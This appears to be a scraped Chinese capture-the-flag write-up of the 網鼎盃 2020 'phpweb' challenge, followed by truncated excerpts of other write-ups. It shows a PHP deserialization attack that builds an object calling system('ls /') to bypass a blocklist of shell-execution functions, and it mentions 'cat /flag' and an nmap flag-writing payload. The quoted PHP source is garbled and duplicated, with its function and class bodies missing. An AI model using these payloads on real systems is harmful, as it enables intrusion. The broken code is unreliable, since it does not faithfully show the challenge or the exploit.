反序列化
檢視原始碼 發現了好東西 誒乙個隱藏的按鈕 本來想著改一下html 但是發現這一直重新整理 於是抓了個包 抱著試一試的心態 隨便改了個func後面跟的東西 發現了call_user_func()
這可是好東西 說明date變數後面跟的就得是函式 p是這個函式的引數 喜出望外cat /flag 頭都被打爛 題目沒有那麼簡單 於是我們先highlight_file一手index.php 拿到原始碼
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) else
}class test }}
$func = $_request["func"];
$p = $_request["p"];
if ($func != null) else
}?>
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) else
}class test }}
$a = new test();
$a -> p = 'ls /';
$a -> func = 'system';
echo (serialize($a));
接下來慢慢找慢慢改就行了 就好辦了
eof
網鼎盃2020朱雀組 web
nmap那題就基本命令然後還有乙個別的方法。用的是nmap,提示 一開始以為是ping命令,後來發現過濾了php。後來試了下nmap的命令組合成功了。payload il flag on flag.txt 存入flag.txt之後直接訪問就行了 php escapeshell 命令執行 因為過濾了p...
網鼎盃 2020 朱雀組 phpweb
在這裡插入 片 重新整理過後 看到他兩個post引數 他名字提示的很明顯了,就是這個函式可以進行任意更改 我起初換成system 直接命令執行 可能他過濾了某些函式,那就讀一下index.php的內容 disable fun array exec shell exec system passthru...
網鼎盃 2020 朱雀組 phpweb
抓包之後是這麼個玩意 func是乙個函式名,而p是乙個引數,所以可以猜測用func來執行p 我們試一試highlight file和index.php 有回顯但是很亂 用func file get contents p index.php disable fun array exec shell e...